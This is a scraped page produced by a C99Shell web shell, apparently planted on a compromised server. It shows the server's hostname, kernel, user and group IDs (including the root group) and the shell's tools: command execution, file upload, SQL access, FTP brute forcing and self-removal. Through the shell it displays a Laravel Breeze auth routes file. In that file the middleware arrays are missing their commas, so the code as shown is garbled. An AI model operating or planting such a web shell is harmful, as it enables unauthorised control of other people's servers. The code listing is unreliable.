!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/vendor/laravel/breeze/stubs/api/routes/   drwxr-xr-x
Free 25.34 GB of 117.98 GB (21.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     auth.php (1.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

use App\Http\Controllers\Auth\AuthenticatedSessionController;
use 
App\Http\Controllers\Auth\EmailVerificationNotificationController;
use 
App\Http\Controllers\Auth\NewPasswordController;
use 
App\Http\Controllers\Auth\PasswordResetLinkController;
use 
App\Http\Controllers\Auth\RegisteredUserController;
use 
App\Http\Controllers\Auth\VerifyEmailController;
use 
Illuminate\Support\Facades\Route;

Route::post('/register', [RegisteredUserController::class, 'store'])
                ->
middleware('guest')
                ->
name('register');

Route::post('/login', [AuthenticatedSessionController::class, 'store'])
                ->
middleware('guest')
                ->
name('login');

Route::post('/forgot-password', [PasswordResetLinkController::class, 'store'])
                ->
middleware('guest')
                ->
name('password.email');

Route::post('/reset-password', [NewPasswordController::class, 'store'])
                ->
middleware('guest')
                ->
name('password.store');

Route::get('/verify-email/{id}/{hash}', [VerifyEmailController::class, '__invoke'])
                ->
middleware(['auth''signed''throttle:6,1'])
                ->
name('verification.verify');

Route::post('/email/verification-notification', [EmailVerificationNotificationController::class, 'store'])
                ->
middleware(['auth''throttle:6,1'])
                ->
name('verification.send');

Route::post('/logout', [AuthenticatedSessionController::class, 'destroy'])
                ->
middleware('auth')
                ->
name('logout');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0048 ]--